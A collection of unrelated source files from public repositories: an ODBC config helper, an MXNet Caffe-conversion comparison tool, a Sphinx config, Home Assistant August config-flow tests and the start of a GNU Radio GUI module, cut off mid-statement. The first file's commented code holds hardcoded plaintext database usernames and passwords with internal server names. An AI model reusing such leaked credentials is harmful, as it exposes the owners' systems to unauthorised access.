:param section: a section in the config file
:return: a dictionary section's entries
"""
dict1 = {}
config = ConfigParser.ConfigParser()
config.optionxform = str # Override optionxform so that keys remain case-sensitive
config.read(config_file)
options = config.options(section)
for option in options:
try:
dict1[option] = config.get(section, option)
if dict1[option] == -1:
print 'not an option'
except:
print("exception on %s!" % option)
dict1[option] = None
return dict1
def get_odbc_connection_string(con_string):
"""
:param con_string: Name of the odbc connection
:return: odbc connection name/string from config_file
"""
odbc_connections = get_config_dict(config_file, 'odbc_connections')
return odbc_connections[con_string]
#print get_odbc_connection_string("DMMESDEConnection")
# def MakeConnection():
# try:
# strKeyPath = "SOFTWARE\ODBC\ODBC.INI\ODBC Data Sources"
# odbckey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)
# except Exception as e:
# pass
# try:
# strValueName = "Dmlr_DB"
# strValue = "SQL Server"
# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# strKeyPath = "SOFTWARE\ODBC\ODBC.INI\Dmlr_DB"
# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)
# strValueName = "Database"
# strValue = "dmlr"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Driver"
# strValue = "C:\WINDOWS\System32\SQLSRV32.dll"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Server"
# strValue = "wsq00796"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Trusted_Connection"
# strValue = "Yes"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# _winreg.CloseKey(valKey)
# except:
# pass
# try:
# strValueName = "DMMESDEConnection"
# strValue = "SQL Server"
# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# strKeyPath = "SOFTWARE\ODBC\ODBC.INI\DMMESDEConnection"
# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)
# strValueName = "Database"
# strValue = "Ep"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Driver"
# strValue = "C:\WINDOWS\System32\SQLSRV32.dll"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Server"
# strValue = "wsq00796"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Trusted_Connection"
# strValue = "Yes"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# _winreg.CloseKey(valKey)
# except:
# pass
# try:
# strValueName = "WaterQuality"
# strValue = "SQL Server"
# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# strKeyPath = "SOFTWARE\ODBC\ODBC.INI\WaterQuality"
# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)
# strValueName = "Database"
# strValue = "WaterQuality"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Driver"
# strValue = "C:\WINDOWS\System32\SQLSRV32.dll"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Server"
# strValue = "DMMESDE"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Trusted_Connection"
# strValue = "Yes"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# _winreg.CloseKey(valKey)
# except:
# pass
# try:
# strValueName = "H2O"
# strValue = "SQL Server"
# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# strKeyPath = "SOFTWARE\ODBC\ODBC.INI\H2O"
# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)
# strValueName = "Database"
# strValue = "H2OSpatial"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Driver"
# strValue = "C:\WINDOWS\System32\SQLSRV32.dll"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Server"
# strValue = "DMMESDE"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# strValueName = "Trusted_Connection"
# strValue = "Yes"
# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)
# except:
# pass
# try:
# _winreg.CloseKey(valKey)
# except:
# pass
# try:
# _winreg.CloseKey(odbckey)
# except:
# pass
# try:
# conn = odbc.odbc("Dmlr_DB")
# conn2 = odbc.odbc("WaterQuality")
# conn3 = odbc.odbc("DMMESDEConnection")
# except:
# try:
# conn = odbc.odbc("DSN=Dmlr_DB2;UID=ags_service;PWD=Welcome1234")
# conn2 = odbc.odbc("DSN=WaterQuality2;UID=wq_guest;PWD=wq_guest")
# conn3 = odbc.odbc("DSN=DMMESDEConnection2;UID=ags_service;PWD=Welcome1234")
# except:
# conn = 1
# conn2 = 1
# conn3 = 1
# connList = [conn, conn2, conn3]
# return connList
#
#
# def get_ep_cursor():
# con = pyodbc.connect('Trusted_Connection=yes',
# driver='{SQL Server}',
# server='wsq00796',
# database='EP')
# return con.cursor()
#
#
# def get_dmlr_cursor():
# con = pyodbc.connect('Trusted_Connection=yes',
# driver='{SQL Server}',
# server='wsq00796',
# database='dmlr')
# return con.cursor()
#
#
# def get_wq_cursor():
# con = pyodbc.connect('Trusted_Connection=yes',
# driver='{SQL Server}',
# server='dmmesde',
# database='WaterQuality')
# return con.cursor()
| gpl-2.0 |
luoyetx/mxnet | example/ssd/tools/caffe_converter/compare_layers.py | 54 | 14536 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test converted models layer by layer
"""
import os
import argparse
import logging
import mxnet as mx
import cv2
import numpy as np
logging.basicConfig(level=logging.INFO)
def read_image(img_path, image_dims=None, mean=None):
"""
Reads an image from file path or URL, optionally resizing to given image dimensions and
subtracting mean.
:param img_path: path to file, or url to download
:param image_dims: image dimensions to resize to, or None
:param mean: mean file to subtract, or None
:return: loaded image, in RGB format
"""
import urllib
filename = img_path.split("/")[-1]
if img_path.startswith('http'):
urllib.urlretrieve(img_path, filename)
img = cv2.imread(filename)
else:
img = cv2.imread(img_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if image_dims is not None:
img = cv2.resize(img, image_dims) # resize to image_dims to fit model
img = np.rollaxis(img, 2) # change to (c, h, w) order
img = img[np.newaxis, :] # extend to (n, c, h, w)
if mean is not None:
mean = np.array(mean)
if mean.shape == (3,):
mean = mean[np.newaxis, :, np.newaxis, np.newaxis] # extend to (n, c, 1, 1)
img = img.astype(np.float32) - mean # subtract mean
return img
def _ch_dev(arg_params, aux_params, ctx):
"""
Changes device of given mxnet arguments
:param arg_params: arguments
:param aux_params: auxiliary parameters
:param ctx: new device context
:return: arguments and auxiliary parameters on new device
"""
new_args = dict()
new_auxs = dict()
for k, v in arg_params.items():
new_args[k] = v.as_in_context(ctx)
for k, v in aux_params.items():
new_auxs[k] = v.as_in_context(ctx)
return new_args, new_auxs
def convert_and_compare_caffe_to_mxnet(image_url, gpu, caffe_prototxt_path, caffe_model_path,
caffe_mean, mean_diff_allowed, max_diff_allowed):
"""
Run the layer comparison on a caffe model, given its prototxt, weights and mean.
The comparison is done by inferring on a given image using both caffe and mxnet model
:param image_url: image file or url to run inference on
:param gpu: gpu to use, -1 for cpu
:param caffe_prototxt_path: path to caffe prototxt
:param caffe_model_path: path to caffe weights
:param caffe_mean: path to caffe mean file
"""
import caffe
from caffe_proto_utils import read_network_dag, process_network_proto, read_caffe_mean
from convert_model import convert_model
if isinstance(caffe_mean, str):
caffe_mean = read_caffe_mean(caffe_mean)
elif caffe_mean is None:
pass
elif len(caffe_mean) == 3:
# swap channels from Caffe BGR to RGB
caffe_mean = caffe_mean[::-1]
# get caffe root location, this is needed to run the upgrade network utility, so we only need
# to support parsing of latest caffe
caffe_root = os.path.dirname(os.path.dirname(caffe.__path__[0]))
caffe_prototxt_path = process_network_proto(caffe_root, caffe_prototxt_path)
_, layer_name_to_record, top_to_layers = read_network_dag(caffe_prototxt_path)
caffe.set_mode_cpu()
caffe_net = caffe.Net(caffe_prototxt_path, caffe_model_path, caffe.TEST)
image_dims = tuple(caffe_net.blobs['data'].shape)[2:4]
logging.info('getting image %s', image_url)
img_rgb = read_image(image_url, image_dims, caffe_mean)
img_bgr = img_rgb[:, ::-1, :, :]
caffe_net.blobs['data'].reshape(*img_bgr.shape)
caffe_net.blobs['data'].data[...] = img_bgr
_ = caffe_net.forward()
# read sym and add all outputs
sym, arg_params, aux_params, _ = convert_model(caffe_prototxt_path, caffe_model_path)
sym = sym.get_internals()
# now mxnet
if gpu < 0:
ctx = mx.cpu(0)
else:
ctx = mx.gpu(gpu)
arg_params, aux_params = _ch_dev(arg_params, aux_params, ctx)
arg_params["data"] = mx.nd.array(img_rgb, ctx)
arg_params["prob_label"] = mx.nd.empty((1,), ctx)
exe = sym.bind(ctx, arg_params, args_grad=None, grad_req="null", aux_states=aux_params)
exe.forward(is_train=False)
compare_layers_from_nets(caffe_net, arg_params, aux_params, exe, layer_name_to_record,
top_to_layers, mean_diff_allowed, max_diff_allowed)
return
def _bfs(root_node, process_node):
"""
Implementation of Breadth-first search (BFS) on caffe network DAG
:param root_node: root node of caffe network DAG
:param process_node: function to run on each node
"""
from collections import deque
seen_nodes = set()
next_nodes = deque()
seen_nodes.add(root_node)
next_nodes.append(root_node)
while next_nodes:
current_node = next_nodes.popleft()
# process current node
process_node(current_node)
for child_node in current_node.children:
if child_node not in seen_nodes:
seen_nodes.add(child_node)
next_nodes.append(child_node)
def compare_layers_from_nets(caffe_net, arg_params, aux_params, exe, layer_name_to_record,
top_to_layers, mean_diff_allowed, max_diff_allowed):
"""
Compare layer by layer of a caffe network with mxnet network
:param caffe_net: loaded caffe network
:param arg_params: arguments
:param aux_params: auxiliary parameters
:param exe: mxnet model
:param layer_name_to_record: map between caffe layer and information record
:param top_to_layers: map between caffe blob name to layers which outputs it (including inplace)
:param mean_diff_allowed: mean difference allowed between caffe blob and mxnet blob
:param max_diff_allowed: max difference allowed between caffe blob and mxnet blob
"""
import re
log_format = ' {0:<40} {1:<40} {2:<8} {3:>10} {4:>10} {5:<1}'
compare_layers_from_nets.is_first_convolution = True
def _compare_blob(caf_blob, mx_blob, caf_name, mx_name, blob_type, note):
diff = np.abs(mx_blob - caf_blob)
diff_mean = diff.mean()
diff_max = diff.max()
logging.info(log_format.format(caf_name, mx_name, blob_type, '%4.5f' % diff_mean,
'%4.5f' % diff_max, note))
assert diff_mean < mean_diff_allowed
assert diff_max < max_diff_allowed
def _process_layer_parameters(layer):
logging.debug('processing layer %s of type %s', layer.name, layer.type)
normalized_layer_name = re.sub('[-/]', '_', layer.name)
# handle weight and bias of convolution and fully-connected layers
if layer.name in caffe_net.params and layer.type in ['Convolution', 'InnerProduct',
'Deconvolution']:
has_bias = len(caffe_net.params[layer.name]) > 1
mx_name_weight = '{}_weight'.format(normalized_layer_name)
mx_beta = arg_params[mx_name_weight].asnumpy()
# first convolution should change from BGR to RGB
if layer.type == 'Convolution' and compare_layers_from_nets.is_first_convolution:
compare_layers_from_nets.is_first_convolution = False
# if RGB or RGBA
if mx_beta.shape[1] == 3 or mx_beta.shape[1] == 4:
# Swapping BGR of caffe into RGB in mxnet
mx_beta[:, [0, 2], :, :] = mx_beta[:, [2, 0], :, :]
caf_beta = caffe_net.params[layer.name][0].data
_compare_blob(caf_beta, mx_beta, layer.name, mx_name_weight, 'weight', '')
if has_bias:
mx_name_bias = '{}_bias'.format(normalized_layer_name)
mx_gamma = arg_params[mx_name_bias].asnumpy()
caf_gamma = caffe_net.params[layer.name][1].data
_compare_blob(caf_gamma, mx_gamma, layer.name, mx_name_bias, 'bias', '')
elif layer.name in caffe_net.params and layer.type == 'Scale':
if 'scale' in normalized_layer_name:
bn_name = normalized_layer_name.replace('scale', 'bn')
elif 'sc' in normalized_layer_name:
bn_name = normalized_layer_name.replace('sc', 'bn')
else:
assert False, 'Unknown name convention for bn/scale'
beta_name = '{}_beta'.format(bn_name)
gamma_name = '{}_gamma'.format(bn_name)
mx_beta = arg_params[beta_name].asnumpy()
caf_beta = caffe_net.params[layer.name][1].data
_compare_blob(caf_beta, mx_beta, layer.name, beta_name, 'mov_mean', '')
mx_gamma = arg_params[gamma_name].asnumpy()
caf_gamma = caffe_net.params[layer.name][0].data
_compare_blob(caf_gamma, mx_gamma, layer.name, gamma_name, 'mov_var', '')
elif layer.name in caffe_net.params and layer.type == 'BatchNorm':
mean_name = '{}_moving_mean'.format(normalized_layer_name)
var_name = '{}_moving_var'.format(normalized_layer_name)
caf_rescale_factor = caffe_net.params[layer.name][2].data
mx_mean = aux_params[mean_name].asnumpy()
caf_mean = caffe_net.params[layer.name][0].data / caf_rescale_factor
_compare_blob(caf_mean, mx_mean, layer.name, mean_name, 'mean', '')
mx_var = aux_params[var_name].asnumpy()
caf_var = caffe_net.params[layer.name][1].data / caf_rescale_factor
_compare_blob(caf_var, mx_var, layer.name, var_name, 'var',
'expect 1e-04 change due to cudnn eps')
elif layer.type in ['Input', 'Pooling', 'ReLU', 'Eltwise', 'Softmax', 'LRN', 'Concat',
'Dropout', 'Crop']:
# no parameters to check for these layers
pass
else:
logging.warn('No handling for layer %s of type %s, should we ignore it?', layer.name,
layer.type)
return
def _process_layer_output(caffe_blob_name):
logging.debug('processing blob %s', caffe_blob_name)
# skip blobs not originating from actual layers, e.g. artificial split layers added by caffe
if caffe_blob_name not in top_to_layers:
return
caf_blob = caffe_net.blobs[caffe_blob_name].data
# data should change from BGR to RGB
if caffe_blob_name == 'data':
# if RGB or RGBA
if caf_blob.shape[1] == 3 or caf_blob.shape[1] == 4:
# Swapping BGR of caffe into RGB in mxnet
caf_blob[:, [0, 2], :, :] = caf_blob[:, [2, 0], :, :]
mx_name = 'data'
else:
# get last layer name which outputs this blob name
last_layer_name = top_to_layers[caffe_blob_name][-1]
normalized_last_layer_name = re.sub('[-/]', '_', last_layer_name)
mx_name = '{}_output'.format(normalized_last_layer_name)
if 'scale' in mx_name:
mx_name = mx_name.replace('scale', 'bn')
elif 'sc' in mx_name:
mx_name = mx_name.replace('sc', 'bn')
if mx_name not in exe.output_dict:
logging.error('mxnet blob %s is missing, time to extend the compare tool..', mx_name)
return
mx_blob = exe.output_dict[mx_name].asnumpy()
_compare_blob(caf_blob, mx_blob, caffe_blob_name, mx_name, 'output', '')
return
# check layer parameters
logging.info('\n***** Network Parameters '.ljust(140, '*'))
logging.info(log_format.format('CAFFE', 'MXNET', 'Type', 'Mean(diff)', 'Max(diff)', 'Note'))
first_layer_name = layer_name_to_record.keys()[0]
_bfs(layer_name_to_record[first_layer_name], _process_layer_parameters)
# check layer output
logging.info('\n***** Network Outputs '.ljust(140, '*'))
logging.info(log_format.format('CAFFE', 'MXNET', 'Type', 'Mean(diff)', 'Max(diff)', 'Note'))
for caffe_blob_name in caffe_net.blobs.keys():
_process_layer_output(caffe_blob_name)
return
def main():
"""Entrypoint for compare_layers"""
parser = argparse.ArgumentParser(
description='Tool for testing caffe to mxnet conversion layer by layer')
parser.add_argument('--image_url', type=str,
default='http://writm.com/wp-content/uploads/2016/08/Cat-hd-wallpapers.jpg',
help='input image to test inference, can be either file path or url')
parser.add_argument('--caffe_prototxt_path', type=str,
default='./model.prototxt',
help='path to caffe prototxt')
parser.add_argument('--caffe_model_path', type=str,
default='./model.caffemodel',
help='path to caffe weights')
parser.add_argument('--caffe_mean', type=str,
default='./model_mean.binaryproto',
help='path to caffe mean file')
parser.add_argument('--mean_diff_allowed', type=int, default=1e-03,
help='mean difference allowed between caffe blob and mxnet blob')
parser.add_argument('--max_diff_allowed', type=int, default=1e-01,
help='max difference allowed between caffe blob and mxnet blob')
parser.add_argument('--gpu', type=int, default=-1, help='the gpu id used for predict')
args = parser.parse_args()
convert_and_compare_caffe_to_mxnet(args.image_url, args.gpu, args.caffe_prototxt_path,
args.caffe_model_path, args.caffe_mean,
args.mean_diff_allowed, args.max_diff_allowed)
if __name__ == '__main__':
main()
| apache-2.0 |
icgc-dcc/dcc-storage | docs/conf.py | 1 | 5104 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# score documentation build configuration file, created by
# sphinx-quickstart on Thu Sep 27 15:44:32 2018.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.mathjax',
'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'score'
copyright = '2018, andricdu'
author = 'andricdu'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.4.0'
# The full version, including alpha/beta/rc tags.
release = '1.4.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'scoredoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'score.tex', 'score Documentation',
'andricdu', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'score', 'score Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'score', 'score Documentation',
author, 'score', 'One line description of project.',
'Miscellaneous'),
]
| gpl-3.0 |
mezz64/home-assistant | tests/components/august/test_config_flow.py | 5 | 9572 | """Test the August config flow."""
from august.authenticator import ValidationResult
from homeassistant import config_entries, setup
from homeassistant.components.august.const import (
CONF_ACCESS_TOKEN_CACHE_FILE,
CONF_INSTALL_ID,
CONF_LOGIN_METHOD,
DOMAIN,
VERIFICATION_CODE_KEY,
)
from homeassistant.components.august.exceptions import (
CannotConnect,
InvalidAuth,
RequireValidation,
)
from homeassistant.const import CONF_PASSWORD, CONF_TIMEOUT, CONF_USERNAME
from tests.async_mock import patch
from tests.common import MockConfigEntry
async def test_form(hass):
"""Test we get the form."""
await setup.async_setup_component(hass, "persistent_notification", {})
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
return_value=True,
), patch(
"homeassistant.components.august.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.august.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "[email protected]"
assert result2["data"] == {
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
CONF_INSTALL_ID: None,
CONF_TIMEOUT: 10,
CONF_ACCESS_TOKEN_CACHE_FILE: "[email protected]",
}
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_invalid_auth(hass):
"""Test we handle invalid auth."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
side_effect=InvalidAuth,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "invalid_auth"}
async def test_user_unexpected_exception(hass):
"""Test we handle an unexpected exception."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
side_effect=ValueError,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_form_cannot_connect(hass):
"""Test we handle cannot connect error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
side_effect=CannotConnect,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_form_needs_validate(hass):
"""Test we present validation when we need to validate."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
side_effect=RequireValidation,
), patch(
"homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code",
return_value=True,
) as mock_send_verification_code:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
},
)
assert len(mock_send_verification_code.mock_calls) == 1
assert result2["type"] == "form"
assert result2["errors"] is None
assert result2["step_id"] == "validation"
# Try with the WRONG verification code give us the form back again
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
side_effect=RequireValidation,
), patch(
"homeassistant.components.august.gateway.AuthenticatorAsync.async_validate_verification_code",
return_value=ValidationResult.INVALID_VERIFICATION_CODE,
) as mock_validate_verification_code, patch(
"homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code",
return_value=True,
) as mock_send_verification_code, patch(
"homeassistant.components.august.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.august.async_setup_entry", return_value=True
) as mock_setup_entry:
result3 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{VERIFICATION_CODE_KEY: "incorrect"},
)
# Make sure we do not resend the code again
# so they have a chance to retry
assert len(mock_send_verification_code.mock_calls) == 0
assert len(mock_validate_verification_code.mock_calls) == 1
assert result3["type"] == "form"
assert result3["errors"] is None
assert result3["step_id"] == "validation"
# Try with the CORRECT verification code and we setup
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
return_value=True,
), patch(
"homeassistant.components.august.gateway.AuthenticatorAsync.async_validate_verification_code",
return_value=ValidationResult.VALIDATED,
) as mock_validate_verification_code, patch(
"homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code",
return_value=True,
) as mock_send_verification_code, patch(
"homeassistant.components.august.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.august.async_setup_entry", return_value=True
) as mock_setup_entry:
result4 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{VERIFICATION_CODE_KEY: "correct"},
)
await hass.async_block_till_done()
assert len(mock_send_verification_code.mock_calls) == 0
assert len(mock_validate_verification_code.mock_calls) == 1
assert result4["type"] == "create_entry"
assert result4["title"] == "[email protected]"
assert result4["data"] == {
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
CONF_INSTALL_ID: None,
CONF_TIMEOUT: 10,
CONF_ACCESS_TOKEN_CACHE_FILE: "[email protected]",
}
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_reauth(hass):
"""Test reauthenticate."""
entry = MockConfigEntry(
domain=DOMAIN,
data={
CONF_LOGIN_METHOD: "email",
CONF_USERNAME: "[email protected]",
CONF_PASSWORD: "test-password",
CONF_INSTALL_ID: None,
CONF_TIMEOUT: 10,
CONF_ACCESS_TOKEN_CACHE_FILE: "[email protected]",
},
unique_id="[email protected]",
)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": "reauth"}, data=entry.data
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.august.config_flow.AugustGateway.async_authenticate",
return_value=True,
), patch(
"homeassistant.components.august.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.august.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_PASSWORD: "new-test-password",
},
)
await hass.async_block_till_done()
assert result2["type"] == "abort"
assert result2["reason"] == "reauth_successful"
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
| apache-2.0 |
MingdaZhou/gnuradio | gr-wxgui/python/wxgui/const_window.py | 58 | 6131 | #
# Copyright 2008 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
##################################################
# Imports
##################################################
import plotter
import common
import wx
import numpy
import math
import pubsub
from constants import *
from gnuradio import gr #for gr.prefs
import forms
##################################################
# Constants
##################################################
SLIDER_STEPS = 200
LOOP_BW_MIN_EXP, LOOP_BW_MAX_EXP = -6, 0.0
GAIN_MU_MIN_EXP, GAIN_MU_MAX_EXP = -6, -0.301
DEFAULT_FRAME_RATE = gr.prefs().get_long('wxgui', 'const_rate', 5)
DEFAULT_WIN_SIZE = (500, 400)
DEFAULT_CONST_SIZE = gr.prefs().get_long('wxgui', 'const_size', 2048)
CONST_PLOT_COLOR_SPEC = (0, 0, 1)
MARKER_TYPES = (
('Dot Small', 1.0),
('Dot Medium', 2.0),
('Dot Large', 3.0),
('Line Link', None),
)
DEFAULT_MARKER_TYPE = 2.0
##################################################
# Constellation window control panel
##################################################
class control_panel(wx.Panel):
"""
A control panel with wx widgits to control the plotter.
"""
def __init__(self, parent):
"""
Create a new control panel.
Args:
parent: the wx parent window
"""
self.parent = parent
wx.Panel.__init__(self, parent, style=wx.SUNKEN_BORDER)
parent[SHOW_CONTROL_PANEL_KEY] = True
parent.subscribe(SHOW_CONTROL_PANEL_KEY, self.Show)
control_box = forms.static_box_sizer(
parent=self, label='Options',
bold=True, orient=wx.VERTICAL,
)
#loop_bw
control_box.AddStretchSpacer()
forms.text_box(
